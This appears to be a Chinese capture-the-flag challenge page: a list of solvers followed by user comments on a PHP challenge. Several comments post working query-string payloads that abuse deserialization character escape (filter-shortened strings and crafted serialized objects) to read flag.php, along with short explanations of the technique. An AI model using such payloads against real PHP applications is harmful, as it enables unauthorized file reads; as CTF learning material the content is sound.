评分(1)
解题动态
mechatengo 攻破了该题 12天前
i8vkmmju 攻破了该题 12天前
pinus 攻破了该题 13天前
时间不会说谎 攻破了该题 14天前
xiaodou 攻破了该题 15天前
879205607 攻破了该题 16天前
jibabenba 攻破了该题 17天前
caixinggang 攻破了该题 20天前
vx606v 攻破了该题 28天前
nihao123@ 攻破了该题 29天前
yxrw 攻破了该题 1月前
abcd7 攻破了该题 1月前
wangmazikkll 攻破了该题 1月前
xiao776 攻破了该题 2月前
ksw0513 攻破了该题 2月前
DangerHe 攻破了该题 3月前
Q-Larry 攻破了该题 3月前
huangyihao 攻破了该题 3月前
2003792 攻破了该题 3月前
评论
KING12366 8月前
举报
Gemini3.0pro直接秒了 出现anice右键查看源码
Ethan552525 8月前
举报
/?a=flagflagflagflagflagflag&b=X%22%3Bs%3A8%3A%22password%22%3BO%3A1%3A%22B%22%3A1%3A%7Bs%3A1%3A%22b%22%3BO%3A1%3A%22C%22%3A1%3A%7Bs%3A1%3A%22c%22%3Bs%3A8%3A%22flaflagg.php%22%3B%7D%7D
whiteHaves 2年前
举报
参数a负责扰乱,使序列化提前结束,参数b负责反序列化之后执行代码,注意:参数b序列化的对象是A类,但只要第二个参数的序列化结果,因为第一个参数就是参数a,不必包含,但是需要用1“结束前文;文件名的长度是8,不是12,因为文件名长度只看过滤后的结果。
绝情且小帅 2年前
举报
?a=flagflagflagflagflagflag &b=1";s:8:"password";O:1:"B":1:{s:1:"b";O:1:"C":1:{s:1:"c";s:8:"flaflagg.php";}}}
xiaobai568 2年前
举报
反序列化逃逸,通过提前闭合使得恶意代码被反序列化,成功读取flag.php
zhaiye 2年前
举报
?a=flagflagflagflagflagflag&b=1";s:8:"password";O:1:"B":1:{s:1:"b";O:1:"C":1:{s:1:"c";s:8:"fflaglag.php";}};}
chaoge 2年前
举报
不容易啊
2728462336 2年前
举报
注意flag.php里的flag也会替换为空,双写逃逸的时候注意其长度
hopeinhand 3年前
举报
反序列化字符逃逸